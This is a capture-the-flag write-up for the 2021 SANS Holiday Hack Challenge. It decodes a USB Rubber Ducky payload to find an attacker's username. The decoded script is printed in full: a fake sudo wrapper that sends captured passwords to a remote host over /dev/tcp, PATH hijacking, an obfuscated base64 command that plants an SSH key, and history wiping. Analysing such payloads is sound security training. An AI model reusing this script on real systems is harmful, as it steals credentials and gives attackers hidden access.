Objective 5: Strange USB Device - 2021 SANS Holiday Hack Challenge
In this challenge, we do some light reverse-engineering on a USB Rubber Ducky.
Play the 2021 SANS Holiday Hack Challenge
Objective
Assist the elves in reverse engineering the strange USB device.
A random USB device, oh what could be the matter? It seems a troll has left this, right on a silver platter. Oh my friend I need your ken, this does not smell of attar. Help solve this challenge quick quick, I shall offer no more natter.
Evaluate the USB data in /mnt/USBDEVICE.
The top of the terminal asks for the username of the troll involved with this attack.
There’s also talk on this that’s pretty critical: HIDden Ducky, Deconstructed Payload
The Challenge
Basically, the summary of the talk is that there’s a language that USB rubber duckies use for scripting called DuckyScript. This script then gets encoded to a binary (called inject.bin) and placed on an SD card in the rubber ducky.
The presenter, Kevin Tyers, has created a python script called Mallard that can decode these inject.bin files.
Running “ls -la” from the home directory reveals that this script is already pre-loaded.
First, let’s just check out that “/mnt/USBDEVICE” directory:
cd /mnt/USBDEVICE
ls -la
this gives us:
total 12
drwxr-xr-x 1 root root 4096 Dec 3 16:25 ./
drwxr-xr-x 1 root root 4096 Dec 3 16:25 ../
-rw-r--r-- 1 root root 2090 Nov 30 22:14 inject.bin
So that inject.bin is in there (where we would expect it to be).
Let’s head back to the home directory and call that mallard script.
cd ~
python3 mallard.py --file /mnt/USBDEVICE/inject.bin
This spits out the DuckyScript for the file.
ENTER
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 500
GUI -
GUI -
GUI -
GUI -
GUI -
STRING /bin/bash
ENTER
DELAY 500
STRING mkdir -p ~/.config/sudo
ENTER
DELAY 200
STRING echo '#!/bin/bash > ~/.config/sudo/sudo
ENTER
STRING /usr/bin/sudo $@
ENTER
STRING echo -n "[sudo] password for $USER: "
ENTER
STRING read -s pwd
ENTER
STRING echo
ENTER
STRING echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
ENTER
STRING if [ $? -eq 1 ]
ENTER
STRING then
ENTER
STRING echo "$USER:$pwd:invalid" > /dev/tcp/trollfun.jackfrosttower.com/1337
ENTER
STRING echo "Sorry, try again."
ENTER
STRING sudo $@
ENTER
STRING else
ENTER
STRING echo "$USER:$pwd:valid" > /dev/tcp/trollfun.jackfrosttower.com/1337
ENTER
STRING echo "$pwd" | /usr/bin/sudo -S $@
ENTER
STRING fi
ENTER
STRING fi' > ~/.config/sudo/sudo
ENTER
DELAY 200
STRING chmod u+x ~/.config/sudo/sudo
ENTER
DELAY 200
STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
ENTER
DELAY 200
STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
ENTER
DELAY 200
STRING echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d | bash
ENTER
DELAY 600
STRING history -c && rm .bash_history && exit
ENTER
DELAY 600
GUI q
There’s no apparent username, but that giant base64 string does look pretty suspicious. Putting this command (without the | bash
) into our own terminal outputs the following:
echo 'ssh-rsa UmN5RHJZWHdrSHRodmVtaVp0d1l3U2JqZ2doRFRHTGRtT0ZzSUZNdyBUaGlzIGlzIG5vdCByZWFsbHkgYW4gU1NIIGtleSwgd2UncmUgbm90IHRoYXQgbWVhbi4gdEFKc0tSUFRQVWpHZGlMRnJhdWdST2FSaWZSaXBKcUZmUHAK ickymcgoop@trollfun.jackfrosttower.com' >> ~/.ssh/authorized_keys
Looks like we have an SSH key here. The username for it is ickymcgoop.
Answer: ickymcgoop